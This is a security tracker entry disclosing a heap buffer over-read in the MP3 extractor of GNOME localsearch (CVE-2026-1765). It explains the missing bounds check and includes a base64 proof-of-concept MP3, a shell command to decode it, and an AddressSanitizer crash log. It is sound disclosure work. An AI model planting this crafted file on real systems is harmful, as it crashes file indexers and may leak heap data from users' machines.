2435981 – (CVE-2026-1765) CVE-2026-1765 localsearch: tracker-miners: GNOME localsearch MP3 Extractor: Denial of Service and potential information disclosure via crafted MP3 files

Bug 2435981 (CVE-2026-1765) - CVE-2026-1765 localsearch: tracker-miners: GNOME localsearch MP3 Extractor: Denial of Service and potential information disclosure via crafted MP3 files

Summary: CVE-2026-1765 localsearch: tracker-miners: GNOME localsearch MP3 Extractor: D...

Keywords:
Status:	NEW
Alias:	CVE-2026-1765
Product:	Security Response
Classification:	Other
Component:	vulnerability
Sub Component:
Version:	unspecified
Hardware:	All
OS:	Linux
Priority:	medium
Severity:	medium
Target Milestone:	---
Assignee:	Product Security DevOps Team
QA Contact:
Docs Contact:
URL:
Whiteboard:
Depends On:	2435994 2435995 2436325
Blocks:
TreeView+	depends on / blocked

Reported:	2026-02-02 14:51 UTC by OSIDB Bzimport
Modified:	2026-02-03 13:26 UTC (History)
CC List:	0 users
Fixed In Version:
Clone Of:
Environment:
Last Closed:
Embargoed:

Attachments	(Terms of Use)

Description OSIDB Bzimport 2026-02-02 14:51:33 UTC

Vulnerability Report: Heap Buffer Overflow in GNOME localsearch MP3 Extractor (TXXX Tags)
Project: https://gitlab.gnome.org/GNOME/localsearch
Component: tracker-extract-mp3
Vulnerability Type: Heap Buffer Overflow (Read)

Description
A heap buffer overflow vulnerability exists in the extract_txxx_tags function of src/extractor/tracker-extract-mp3.c. This function handles User Defined Text Information Frames (TXXX). When parsing these frames, the code calculates an offset based on the description string length but fails to verify if this offset exceeds the total frame size (csize) before using it to calculate the remaining buffer size for the text value.

Root Cause Analysis
The vulnerability occurs due to a missing bounds check:

// src/extractor/tracker-extract-mp3.c:1487
text_desc_len = id3v2_strlen (text_encode, text_desc, csize - 4);
offset        = 4 + text_desc_len + id3v2_nul_size (text_encode);

// VULNERABILITY: No check if offset >= csize

text          = &data[pos + offset]; // data pointer advanced

if (version == 2.4f) {
    // Underflow happens here:
    // If offset > csize, (csize - offset) wraps around to a huge value (unsigned subtraction).
    // This huge value is passed as the length to id3v24_text_to_utf8/g_convert.
    value = id3v24_text_to_utf8 (text_encode, text, csize - offset, info);
}


This leads to g_convert receiving a very large length (or -1 if interpreted as signed), causing it to read out of bounds from the heap.

Impact


Denial of Service: Reading unmapped memory causes a SIGSEGV.

Information Disclosure: Potentially reads sensitive data from the heap if a null byte is found far away.


PoC File (Base64)
You can recreate the crash file by decoding this base64 string.
MD5 Checksum: 2a98a39a6ee191ac5492aff97c407f1023005243

base64 -d <<EOF > reproduction_txxx.mp3
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cG9zZXJUT1BFAAAAEAAAAG9yadlpbmFsIGFydGlzdFRDT1AAAAAKAAAAY29weXJpZ2h0V1hYWAAAABQAaAB0AAB0cDovL2V4YW1wbGUuY29tVEVOQwAAAAgAAABlbmNvZGVySVBMUwAAAkEAAElEMwQAAAAAEVFVVVVVVElUMgAAABEAAANTaW1wbHkgSnV2ZW5pbGUAVFBUWUVSRTEAAAAIAAADQWJCYWJ5AFRSQ0sAAAAEAAAAMTMAVEFMQgAAAAgAAANTaW5Db3MAVERSQwAAAAYAAAMyMDA4AFRDT04AAAAFAAADUG9wAFRDT00AAAAEAAADQWIAVENPUAAAAAYAAAM2GA1SD5Djgz+j0WPAGhOA1San+VxbHKRtYBqV0f945qKEakhEJfVkpuGtFs2+zsrBYy4d0Lumzv/zQsTQFFq23FZ6RC1QQxWw+DDIYqVq9EOFElVCqeg5SllNz+WWq9VIj/sjJ/1OW9fwYVrS9FDu9vhpAIBGn+nGCTnhri+MmjNV6jKa8WNHXNuaj9y5G93tqnTcN3/96UNPveUMESbUd53lHtnr7Xrdfpf8s9JUQy3xqMIq3QBO1mLlj0ydQzl5piEuuBtx0P/zQsSxE4FS0AAKRgzE/+YUapTfajc3zidUV9UanaXkkZWeeKocgoYlQg5Gw4YVbFcpe9veaankuDgGEk6myL/FQsReAAADSAHAAACqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqJKqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo2hTaTKzdiiW86tLUEVC//80LE5h1CRtlGeYcRX0QQm9FH8O2t65mfs3cnCeShvVV/s+oqrbOZDFQrq5fVii06kou33E7z+38IbKMAVRGaCAO3KCxYSiRVB0iSDkvIN+7JtjTo3X0U87xk82igEM//80LE7FVURi04GDrS1A55hJzTax9SRmzcw0OBik/XcubEYoiLgs0hTLP9NfOze/zy5r8L77MoStyvNbO36JUCAZWgjA9M/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////+R04ZLCMvSmX4KPa6L/v3adtSV5oiJaGxoKSumjZUTu/og6mRhpdDv/80DE5xb60uWWeUZcDajWoWjSKiCxkV0tzEflKj8+2rKknbtoK9yj0X7szJZxM+y4RYyIkicFMXNxLJcqBVtrpx1I24RJ4jsS+zexZlEMv99CWdHCuv/a3RGEt/6WzIBHmdjstNfqvBL/80LEiRR68tSmeYQstzvMk9aMR7qCJ9TI6gAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFREUkwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAEAAAGkAAAggDQAAAAAAARVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVMQU1FMy4xMDBVVVVVVVVVVVVVVVVVVVVVVVVVVVVV//sUZB4P8AAAaQAAAAgAAA0gAAABAAABpAAAACAAADSAAAAEVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVMQZz6SLQQxzyqZ226UVtAVku0xdntm16s26UGDs1abq6RR35WiVfab/hPIe9tLlIQCk5hodIC4oJi+z42jAWXlZ1HcwG3qK+YdlVVVfr6jn//80LEchRVcl72H1XLEAFydcIb797DzGVNlhWa1qLTDa92dTFdwW/8lbrtf6qqqqqqqqqqqqqqqqqqqqqqqqqq//NAxLoAAAP658uX4rIjhKdiAGBw+x2m7oNOz9aqzC4YBxs/7V20v3M6mE2DPE/3g0DjyafrOZp/vi7638uh/0DN7fRVZ/T43/s6J/RwZ1V6RXzUHr3NFUWVCE8MWX6PiyVKfYTjxYf9Shj/80LEXhMafuC2WYRYQvW7SAAAAACqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqVEFHU2ltcGx5IEp1dmVuaWxlAAAAAAAAAAAAAAAAAAAAQWJCYWJ5AAAAAAAAAAAAAAAAAABNRTMuMTAn8TAAAAAAAAAAAAAAU2luQ29zAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMjAwOAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADQ0=
EOF



Crash Log

localsearch git:(main) ✗ ASAN_OPTIONS=detect_odr_violation=0 ./build/src/extractor/localsearch-extractor-3 --file crash-2a98a39a6ee191ac5492aff97c407f1023005243

(process:1778275): Tracker-WARNING **: 20:15:26.571: No seccomp support compiled-in.
=================================================================
==1778275==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x50300000aace at pc 0x769ee387d96f bp 0x7ffe245e75a0 sp 0x7ffe245e6d48
READ of size 1 at 0x50300000aace thread T0
    #0 0x769ee387d96e in strlen ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:391
    #1 0x769ee3fbfc57 in g_convert_with_iconv (/lib/x86_64-linux-gnu/libglib-2.0.so.0+0x39c57) (BuildId: 94bfd21331c311d3199726de93a2656d07c22b33)
    #2 0x769ee3fbff81 in g_convert (/lib/x86_64-linux-gnu/libglib-2.0.so.0+0x39f81) (BuildId: 94bfd21331c311d3199726de93a2656d07c22b33)
    #3 0x769ee27ded14 in convert_to_encoding ../src/extractor/tracker-extract-mp3.c:837
    #4 0x769ee27e1308 in id3v24_text_to_utf8 ../src/extractor/tracker-extract-mp3.c:1261
    #5 0x769ee27e22d9 in extract_txxx_tags ../src/extractor/tracker-extract-mp3.c:1492
    #6 0x769ee27e2f83 in get_id3v24_tags ../src/extractor/tracker-extract-mp3.c:1635
    #7 0x769ee27e602e in parse_id3v24 ../src/extractor/tracker-extract-mp3.c:2286
    #8 0x769ee27e75cd in parse_id3v2 ../src/extractor/tracker-extract-mp3.c:2615
    #9 0x769ee27e7bd0 in tracker_extract_get_metadata ../src/extractor/tracker-extract-mp3.c:2697
    #10 0x5ff36cac1d28 in get_file_metadata ../src/extractor/tracker-extract.c:217
    #11 0x5ff36cac3a30 in tracker_extract_file_sync ../src/extractor/tracker-extract.c:509
    #12 0x5ff36cac7f2d in run_standalone ../src/extractor/tracker-main.c:218
    #13 0x5ff36cac8aa7 in do_main ../src/extractor/tracker-main.c:370
    #14 0x5ff36cac9475 in main ../src/extractor/tracker-main.c:469
    #15 0x769ee2e2a1c9 in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58
    #16 0x769ee2e2a28a in __libc_start_main_impl ../csu/libc-start.c:360
    #17 0x5ff36cab9684 in _start (/tmp/localsearch/build/src/extractor/localsearch-extractor-3+0x12684) (BuildId: f9112407d77014a3cdb422851c1f4cce6c2b9852)

0x50300000aace is located 1 bytes after 29-byte region [0x50300000aab0,0x50300000aacd)
allocated by thread T0 here:
    #0 0x769ee38fd340 in calloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:77
    #1 0x769ee3fe9721 in g_malloc0 (/lib/x86_64-linux-gnu/libglib-2.0.so.0+0x63721) (BuildId: 94bfd21331c311d3199726de93a2656d07c22b33)
    #2 0x769ee27de7f9 in un_unsync ../src/extractor/tracker-extract-mp3.c:767
    #3 0x769ee27e5fb2 in parse_id3v24 ../src/extractor/tracker-extract-mp3.c:2285
    #4 0x769ee27e75cd in parse_id3v2 ../src/extractor/tracker-extract-mp3.c:2615
    #5 0x769ee27e7bd0 in tracker_extract_get_metadata ../src/extractor/tracker-extract-mp3.c:2697
    #6 0x5ff36cac1d28 in get_file_metadata ../src/extractor/tracker-extract.c:217
    #7 0x5ff36cac3a30 in tracker_extract_file_sync ../src/extractor/tracker-extract.c:509
    #8 0x5ff36cac7f2d in run_standalone ../src/extractor/tracker-main.c:218
    #9 0x5ff36cac8aa7 in do_main ../src/extractor/tracker-main.c:370
    #10 0x5ff36cac9475 in main ../src/extractor/tracker-main.c:469
    #11 0x769ee2e2a1c9 in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58
    #12 0x769ee2e2a28a in __libc_start_main_impl ../csu/libc-start.c:360
    #13 0x5ff36cab9684 in _start (/tmp/localsearch/build/src/extractor/localsearch-extractor-3+0x12684) (BuildId: f9112407d77014a3cdb422851c1f4cce6c2b9852)

SUMMARY: AddressSanitizer: heap-buffer-overflow ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:391 in strlen
Shadow bytes around the buggy address:
  0x50300000a800: fa fa fd fd fd fd fa fa fd fd fd fd fa fa fd fd
  0x50300000a880: fd fd fa fa 00 00 00 00 fa fa 00 00 00 00 fa fa
  0x50300000a900: fd fd fd fd fa fa fd fd fd fd fa fa 00 00 05 fa
  0x50300000a980: fa fa fd fd fd fd fa fa fd fd fd fd fa fa fd fd
  0x50300000aa00: fd fd fa fa fd fd fd fd fa fa fd fd fd fa fa fa
=>0x50300000aa80: fd fd fd fd fa fa 00 00 00[05]fa fa 00 00 00 00
  0x50300000ab00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x50300000ab80: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x50300000ac00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x50300000ac80: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x50300000ad00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb

Note You need to log in before you can comment on or make changes to this bug.